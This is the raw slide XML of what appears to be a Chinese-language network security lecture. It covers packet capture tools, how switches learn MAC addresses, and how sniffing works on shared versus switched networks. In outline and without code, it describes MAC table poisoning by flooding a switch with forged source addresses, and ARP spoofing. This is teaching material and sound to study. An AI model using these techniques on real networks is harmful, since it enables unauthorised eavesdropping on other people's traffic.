            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手动，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动抓包，利用工具，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163842" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>共享式网络监听原理</a:t>
            </a:r>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pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564433156"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工作在链路层，物理上和逻辑上都是星型结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>维护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口”映射的交换表，只发帧到特定端口，不同端口可同时工作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同时工作，不冲突</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ethernet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387"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5-</a:t>
            </a:r>
            <a:fld id="{CCD06FB9-67A5-4406-83E0-A4ECEAF8DD85}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6839272" y="4016077"/>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49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7713985" y="3666827"/>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6" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696522" y="3604914"/>
            <a:ext cx="70211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rPr>
              <a:t>端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7802885" y="4046239"/>
            <a:ext cx="339837"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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6549701" y="3608089"/>
            <a:ext cx="13346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latin typeface="仿宋_GB2312"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="仿宋_GB2312"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7223447" y="4047827"/>
            <a:ext cx="511358"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A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>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A`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77"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7" y="3573016"/>
            <a:ext cx="3180161" cy="29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784163" y="4637575"/>
            <a:ext cx="4290151" cy="830997"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>平面交通</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>立体交通</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A705EDCD-55E2-4568-A109-71583C68F2D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489042" y="5661248"/>
            <a:ext cx="5019062" cy="1200329"/>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a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：共享冲突域和广播域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：分隔冲突域，共享广播域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：不共享</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80245565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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="400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03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0387">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4003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03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0387">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4003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0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p:bldP spid="6" grpId="0"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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交换表：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, TTL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过期表项将被删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTL=60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分钟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交换机自学习</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当接收一数据帧时，交换机学习并记录发送者与位置（接口）对应关系：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即数据帧进入交换机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网段与接口之间的对应关系</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机交换机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411"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5-</a:t>
            </a:r>
            <a:fld id="{2A98903C-7AA7-4930-8EEE-50773B6E7076}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14113487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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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44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4483">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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4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4483">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="404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448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04483">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="404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448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4483">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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4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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正常模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查表命中：按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口映射表转发帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播广播帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查表未中：广播帧目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在交换表中查不到的帧</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络监听：须使不应到达的数据包到达本地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用交换机的镜像功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交换机毒化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216066" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换式网络监听原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E28B99C0-D253-4399-9EC5-4C99E0DEA534}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210530661"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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交换表空间有限，新“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口”映射会替换旧表项。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>毒化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者发送大量具有不同伪造源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址的帧，交换机自学习，将伪造“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口”映射填充整个交换机表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>毒化后</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口”表项无效</a:t>
            </a:r>
